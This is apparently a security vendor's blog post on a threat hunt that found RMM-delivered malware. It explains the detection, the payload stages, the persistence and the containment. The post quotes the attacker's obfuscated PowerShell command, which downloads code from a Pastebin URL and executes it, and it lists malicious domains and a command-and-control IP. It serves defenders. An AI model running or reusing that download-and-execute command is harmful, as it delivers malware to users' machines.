War Room

Shells From Above

RSM logo

Home > Defense > Threat Hunting Win: Uncovering Multi-Stage Malware from RMM Abuse

Threat Hunting Win: Uncovering Multi-Stage Malware from RMM Abuse

By

At RSM Defense, we embrace a proactive approach to cybersecurity. Instead of waiting for alerts to trigger a response, our Threat Hunting team regularly conducts hypothesis-driven investigations. These investigations are designed to uncover subtle threats hiding within behavior that might seem legitimate.

In late May 2025, our proactive approach paid off when we uncovered an active malware infection stemming from the abuse of Remote Monitoring and Management (RMM) tools.

The Hypothesis: RMM as a Vector

Remote Monitoring and Management tools are widely used by IT and support teams. Unfortunately, their ubiquity also makes them attractive targets for threat actors seeking stealthy initial access or execution. Our recurring hypothesis was:

“If RMM software is being misused, we may observe it operating from suspicious directories.”

During our hunt on May 30, that’s exactly what we found.

Stage 1: Obfuscated PowerShell and Pastebin

We detected a heavily obfuscated PowerShell command that had been executed. It looked like this:

  • powershell -NoP -w 1 -c “$b = ‘iwr’; $w = & $b -UseBasicParsing(‘h’ +’t’ +’t’ + ‘p’ + ‘s://past’ + ‘ebi’ + ‘n.com’ + ‘/ra’ + ‘w/wftk656V’); $a = ‘iex’; & $a $w”

This script:

  • Constructed its URL and commands using string concatenation to evade basic detection
  • Pulled down a second-stage PowerShell payload from hxxps://Pastebin[.]com/raw/wftk656V
  • Executed that remote code directly using Invoke-Expression

Stage 2: Payload Delivery and Persistence

The hosted Pastebin script downloaded a ZIP archive from a known malicious domain:

  • hxxp://nasotomasyon[.]com/kopal[.]zip

It then:

  • Extracted and dropped a file named client32.exe into a randomized subfolder of ProgramData
  • Established persistence by setting a new Run key in the Windows Registry:
  • HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
  • with the key name MySoft pointing to the path of the malicious executable.

These actions were confirmed in SentinelOne’s Singularity Data Lake, including:

  • Outbound connections to both the Pastebin and malicious ZIP URLs
  • Creation of the Registry key
  • File writes related to the extracted executable

Containment and Investigation

Once identified, the endpoint was immediately isolated from the network.

  • exe was actively beaconing to 176[.]65[.]142[.]78
  • There was no evidence of lateral movement, privilege escalation, or data exfiltration.

This swift containment, paired with high-confidence verification, prevented the threat from escalating further.

Key Takeaways
  • Recurring hunts produce real results. This malware was caught by an intentional, proactive hunt.
  • Public services like Pastebin continue to be abused by attackers. Script delivery via public URLs remains a low-effort, high-success tactic.
  • RMM tooling remains a high-value attack surface. Its ubiquity and system-level access make it an ideal target for adversaries.
Conclusion

This incident is a textbook example of why threat hunting matters. By thinking like an attacker and routinely testing hypotheses, our team caught a threat before it could become a breach. Prevention is great. However, visibility, curiosity, and human-led detection are what make defense truly proactive.